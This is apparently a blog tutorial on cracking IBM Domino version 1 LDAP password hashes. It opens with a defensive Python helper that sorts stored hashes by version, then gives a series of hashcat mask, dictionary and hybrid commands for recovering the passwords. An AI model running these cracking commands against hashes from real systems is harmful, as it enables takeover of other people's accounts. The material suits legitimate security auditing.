If you have an IBM Lotus Domino LDAP server, you should know that its password hashes can be easily cracked. There are three versions of the hash algorithm:
- Version 1: 32 characters long, hexadecimal character set (`A-F`, `0-9`), starts and ends in parentheses
- Version 2: 22 characters long, extended character set (`A-Z` including upper and lower case, `0-9` plus special characters), starts with `(G` and ends in `)`
- Version 3: 51 characters long, same character set as version 2, starts with `(H` and ends in `)`
You can read more details about those algorithms at the following link: Understanding IBM Domino password hashes
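To find out which accounts still store the version 1 format, the three formats listed above can be told apart by shape alone. The following audit helper is an added example, not code from the original post; the `name:hash` export layout, the function names and the sample values are assumptions made for illustration.

```python
import re
from collections import defaultdict

# V1 per the list above: 32 hexadecimal characters wrapped in parentheses.
V1_RE = re.compile(r"^\([0-9A-Fa-f]{32}\)$")


def classify(value: str) -> str:
    """Return 'v1', 'v2', 'v3' or 'unknown' for one stored hash string."""
    value = value.strip()
    if V1_RE.match(value):
        return "v1"
    # V2 and V3 are told apart by prefix only. Their lengths are not
    # enforced here because the list above does not say whether the
    # stated 22 and 51 characters include the parentheses.
    if value.endswith(")"):
        if value.startswith("(G"):
            return "v2"
        if value.startswith("(H"):
            return "v3"
    return "unknown"


def audit(export_lines):
    """Group account names by hash version from 'name:hash' lines (assumed layout)."""
    report = defaultdict(list)
    for line in export_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, value = line.partition(":")
        if not sep:  # malformed line: keep it visible instead of dropping it
            report["unknown"].append(line)
            continue
        report[classify(value)].append(name)
    return dict(report)


# Constructed sample export; the values are made up, not real hashes.
SAMPLE = [
    "alice:(0123456789ABCDEF0123456789ABCDEF)",
    "bob:(G" + "a" * 19 + ")",
    "carol:(H" + "b" * 48 + ")",
    "dave:not-a-domino-hash",
    "erin:(FEDCBA9876543210FEDCBA9876543210)",
]

if __name__ == "__main__":
    for version, names in sorted(audit(SAMPLE).items()):
        print(f"{version}: {', '.join(names)}")
```

Accounts reported under `v1` are the ones exposed to the cracking approach described in the rest of this post.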
In this post we will see how to break V1 password hashes. First of all, download hashcat and search for good dictionaries (weakpass is an awesome resource… ssssh!). Then, before starting the cracking process, look at the mask attack documentation to better understand the charsets used in hashcat.
Good, now you are ready to start…
```bash
# All passwords having any-char and length from 1 to 6
hashcat -m 8600 --increment --increment-min=1 -a 3 hashes.txt ?a?a?a?a?a?a
# All [a-z0-9] passwords having length from 7 to 8
hashcat -m 8600 --increment --increment-min=7 -1 ?l?d -a 3 hashes.txt ?1?1?1?1?1?1?1?1
# All numeric passwords having length from 9 to 10
hashcat -m 8600 --increment --increment-min=9 -a 3 hashes.txt ?d?d?d?d?d?d?d?d?d?d
# All passwords having 6 lowercase letters and 3 numbers
hashcat -m 8600 -a 3 hashes.txt ?l?l?l?l?l?l?d?d?d
# All passwords having 5 lowercase letters, 1 dot and 2 numbers
hashcat -m 8600 -a 3 hashes.txt ?l?l?l?l?l.?d?d
# All passwords having 1 any-char, 5 lowercase letters, 1 any-char and 1 number
hashcat -m 8600 -a 3 hashes.txt ?a?l?l?l?l?l?a?d
# All passwords having 1 [a-zA-Z] char, 6 lowercase letters and 2 numbers
hashcat -m 8600 -1 ?l?u -a 3 hashes.txt ?1?l?l?l?l?l?l?d?d
# All passwords contained in dictionaries
hashcat -m 8600 -a 0 hashes.txt dictionaries/weakpass_2
hashcat -m 8600 -a 0 hashes.txt dictionaries/HashesOrg
# All passwords combining words in dictionaries and masks
hashcat -m 8600 -1 ?l?u?d -a 6 hashes.txt dictionaries/rockyou.txt ?1?1
hashcat -m 8600 -a 6 hashes.txt dictionaries/rockyou.txt ?d?d?d
hashcat -m 8600 -a 6 hashes.txt dictionaries/hk_hlm_founds.txt ?a
# All passwords combining masks and words in dictionaries
hashcat -m 8600 -1 ?l?u?d -a 7 hashes.txt ?1?1 dictionaries/rockyou.txt
hashcat -m 8600 -a 7 hashes.txt ?d?d?d dictionaries/rockyou.txt
hashcat -m 8600 -a 7 hashes.txt ?a dictionaries/hk_hlm_founds.txt
```